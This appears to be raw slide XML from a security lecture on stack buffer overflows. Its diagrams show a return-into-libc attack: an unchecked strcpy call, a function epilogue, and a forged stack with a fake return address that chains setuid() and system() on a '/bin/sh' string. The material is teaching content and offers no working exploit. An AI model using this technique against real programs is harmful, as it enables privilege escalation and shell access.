              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/bin/sh0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202208" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="5029201"/>
            <a:ext cx="1794081" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202211" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5086351"/>
            <a:ext cx="1626792" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buffer,x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202212" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4800600" y="3086100"/>
            <a:ext cx="762000" cy="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2213" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876802" y="3086101"/>
            <a:ext cx="1003801" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202218" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6172200" y="2171700"/>
            <a:ext cx="0" cy="7429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2219" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8077200" y="2171700"/>
            <a:ext cx="0" cy="7429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2220" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8077200" y="2914650"/>
            <a:ext cx="0" cy="17145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2221" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6172200" y="2914650"/>
            <a:ext cx="0" cy="17145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2222" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="26289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fake caller return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202223" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="23431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err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/bin/sh0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202224" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7086600" y="2857500"/>
            <a:ext cx="0" cy="45720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2227" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Return-into-libc Overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="ヒラギノ角ゴ Pro W3" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202228" name="Text Box 52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6163441" y="3371851"/>
            <a:ext cx="1531188" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is the address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> believes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>it was called from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202229" name="Freeform 53"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="4686300"/>
            <a:ext cx="1219200" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="384" y="240"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="768" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="768" h="240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="120"/>
                  <a:pt x="256" y="240"/>
                  <a:pt x="384" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="240"/>
                  <a:pt x="640" y="120"/>
                  <a:pt x="768" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202230" name="Freeform 54"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="4686300"/>
            <a:ext cx="2133600" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="384" y="240"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="768" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="768" h="240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="120"/>
                  <a:pt x="256" y="240"/>
                  <a:pt x="384" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="240"/>
                  <a:pt x="640" y="120"/>
                  <a:pt x="768" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="me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59592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2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21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21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22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22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022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22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022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22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022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22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022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022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022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022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022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022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022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22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022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022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022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02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98" grpId="0" animBg="1"/>
      <p:bldP spid="1202199" grpId="0" animBg="1"/>
      <p:bldP spid="1202200" grpId="0" animBg="1"/>
      <p:bldP spid="1202201" grpId="0" animBg="1"/>
      <p:bldP spid="1202202" grpId="0" animBg="1"/>
      <p:bldP spid="1202203" grpId="0" animBg="1"/>
      <p:bldP spid="1202204" grpId="0" animBg="1"/>
      <p:bldP spid="1202205" grpId="0" animBg="1"/>
      <p:bldP spid="1202206" grpId="0" animBg="1"/>
      <p:bldP spid="1202207" grpId="0" animBg="1"/>
      <p:bldP spid="1202211" grpId="0"/>
      <p:bldP spid="1202212" grpId="0" animBg="1"/>
      <p:bldP spid="1202213" grpId="0"/>
      <p:bldP spid="1202218" grpId="0" animBg="1"/>
      <p:bldP spid="1202219" grpId="0" animBg="1"/>
      <p:bldP spid="1202220" grpId="0" animBg="1"/>
      <p:bldP spid="1202221" grpId="0" animBg="1"/>
      <p:bldP spid="1202222" grpId="0" animBg="1"/>
      <p:bldP spid="1202223" grpId="0" animBg="1"/>
      <p:bldP spid="1202224" grpId="0" animBg="1"/>
      <p:bldP spid="1202228" grpId="0"/>
      <p:bldP spid="1202229" grpId="0" animBg="1"/>
      <p:bldP spid="1202230" grpId="0" animBg="1"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Executing Multiple Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="37719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saved ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205252" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="34861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saved eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205253" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="4057650"/>
            <a:ext cx="1905000" cy="8572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buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205254" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="4800600"/>
            <a:ext cx="0" cy="68580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5255" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="304800" y="2343150"/>
            <a:ext cx="0" cy="11430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56" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="2343150"/>
            <a:ext cx="0" cy="11430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57" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="49149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58" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="304800" y="49149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59" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="37719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garbage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205260" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="34861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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205261" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="4057650"/>
            <a:ext cx="1905000" cy="8572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garbage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205262" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4800600"/>
            <a:ext cx="0" cy="68580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5263" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="23431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64" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4343400" y="23431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65" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4343400" y="49149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66" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="49149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67" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="32004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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205268" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="29146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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205269" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="26289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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/bin/sh0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205273" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="4800600"/>
            <a:ext cx="0" cy="68580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5274" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="23431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75" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6477000" y="23431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76" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6477000" y="3486150"/>
            <a:ext cx="0" cy="17145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77" name="Line 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="3486150"/>
            <a:ext cx="0" cy="17145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78" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="32004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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205279" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="29146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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205280" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="26289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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
